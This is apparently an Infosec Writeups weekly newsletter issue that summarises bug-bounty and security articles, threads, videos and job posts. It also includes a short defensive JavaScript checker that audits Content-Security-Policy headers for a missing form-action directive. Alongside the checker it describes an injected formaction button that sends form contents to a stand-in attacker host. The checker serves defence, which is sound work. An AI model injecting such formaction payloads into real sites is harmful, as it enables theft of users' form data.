👩‍💻IW Weekly #101: CSP Bypass using formaction attribute, 200 hours of hacking to $20K, CVE-2024-1403 analysis, Necessity of DevSecOps, Use of Github Actions to Bypass Microsoft Entra Smart Lockout and many more…


Welcome to the #IWWeekly101 - the Monday newsletter that brings the best in Infosec straight to your inbox.

To help you out, we have 5 Articles, 4 Threads, 3 Videos, 2 Job Alerts and a Special Item 🫢

Read, upskill yourself and spread love to the community 💝

Excited? Let’s jump in 👇

📝 5 Infosec Articles

  1. Get insights into bypassing CSP using the formaction attribute with @garethheyes from @portswigger's research team.
  2. Gain valuable insights from @mzaherii and @NikoueiMohammad's rewarding journey of spending 200 hours on hardcore bug hunting against a single target, ultimately netting an impressive $20,000.
  3. Take a deep dive into CVE-2024-1403 with @Horizon3ai's team, unraveling the intricacies of the Progress OpenEdge authentication bypass.
  4. @vishnuprasadk46 underscores the importance of resilience, adaptability, and proactive security measures in their recent blog, emphasizing the necessity of DevSecOps.
  5. Gain practical insights from @dunderhay's straightforward analysis on leveraging GitHub Actions to bypass Microsoft Entra Smart Lockout.

🧵 4 Trending Threads

  1. Discover valuable bugs by exploring JavaScript files, a treasure trove for hunters. Learn why and how with @0xblackbird's insightful guide.
  2. Unlock easy critical vulnerabilities by identifying unique attack surfaces. @hacker_ shares a riveting tale of hacking a car company to demonstrate how it's done.
  3. Unveiling the pitfalls of directory brute-forcing: @hacker_ warns against filtering by status code alone.
  4. Exploring the route: @hacker_ delves into accessing vulnerability reports sent to a $40B+ company, shedding light on crucial security lapses.
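A quick check to go with the first article above. This is an added example written for this issue, not code from @garethheyes or @portswigger's research: it audits a Content-Security-Policy string for the gap that makes formaction abuse possible. The relevant CSP rule is that `form-action` does not fall back to `default-src`, so a policy that locks scripts down with nonces can still let an injected `<button formaction="https://attacker.example/">` submit a form's contents off-site. The sample policies and the `attacker.example` host are constructed for illustration.

```javascript
// Added example: audit a CSP header for a missing or lax form-action directive.
// Not taken from the linked research; policies below are constructed samples.

// Parse "name value value; name value" into a Map of directive -> source list.
function parseCsp(header) {
  const policy = new Map();
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    policy.set(name.toLowerCase(), values);
  }
  return policy;
}

// Return a list of findings; an empty list means form submission is restricted.
function auditFormAction(header) {
  const policy = parseCsp(header);
  const findings = [];
  if (!policy.has('form-action')) {
    // default-src is NOT a fallback for form-action, so a strict script-src
    // alone does nothing to stop <form action> or <button formaction> exfiltration.
    findings.push('form-action missing: default-src does not cover it, forms may submit anywhere');
    return findings;
  }
  const values = policy.get('form-action');
  if (values.includes('*')) findings.push("form-action allows '*'");
  if (values.some(v => /^https?:$/.test(v))) findings.push('form-action allows a bare scheme');
  return findings;
}

// Constructed sample: looks strict, yet still allows formaction exfiltration.
const LAX = "default-src 'self'; script-src 'nonce-abc123' 'strict-dynamic'; object-src 'none'";
// Hardened variant: the same policy with an explicit form-action.
const HARDENED = LAX + "; form-action 'self'";

console.log('LAX      ->', auditFormAction(LAX));
console.log('HARDENED ->', auditFormAction(HARDENED));
```

Run it with Node; the lax policy reports the missing directive while the hardened one reports nothing. The fix is always the same: add an explicit `form-action 'self'` (or an allowlist) rather than relying on `default-src`.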

📽️ 3 Insightful Videos

  1. In his latest video, @Nahamsec cuts through the complexities of Cross-Site Request Forgery (CSRF), offering a succinct yet detailed exploration of the vulnerability.
  2. @_JohnHammond dissects the hidden malware risks in PDFs in his latest video, offering crucial insights for cybersecurity awareness.
  3. @bsidesahmedabad has released @infosec_au's keynote from their 2023 event, where he delves into a decade of experience hacking on bug bounties.

💼 2 Job Alerts

  1. Join the defense! @GitHubSecurity is hiring a Senior Security Analyst for the Threat Intelligence team—exciting remote opportunity in the US. Apply now to be at the forefront of safeguarding the digital realm.
  2. Explore exciting career opportunities at @Bugcrowd. From Sr. Director of Growth Marketing to Hacker Success Project Manager, discover diverse roles with an awesome leadership team. Join us in shaping the future of cybersecurity.

🎁 1 Special Item

  1. This week’s special item deals with an amazing guide into API security from @thebinarybot. Go and grab this opportunity at just $8.

Watch “Understanding Chinese Cyber Threats” by Saikrishna Budamgunta at IWCON2023 and let us know how informative you have found this talk by tagging us on your social media platforms.


That’s all for this week. Hope you enjoyed these incredible finds and learned something new from today’s newsletter. Meet you again next week hacker, until then keep pushing 💪

This newsletter would not have been made possible without our amazing ambassadors.

Resource contribution by: Nikhil A Memane, Hardik Singh, Ayush Singh, Manan, Ansh Patel
Newsletter formatting by: Ayush Singh, Nithin R, Manan, Shlok, Pawan Gambhir, Ansh Patel

Lots of love
Editorial team,

Infosec Writeups

📧 If you have questions, comments, or feedback, reach out to us on Twitter @InfoSecComm or email [email protected]
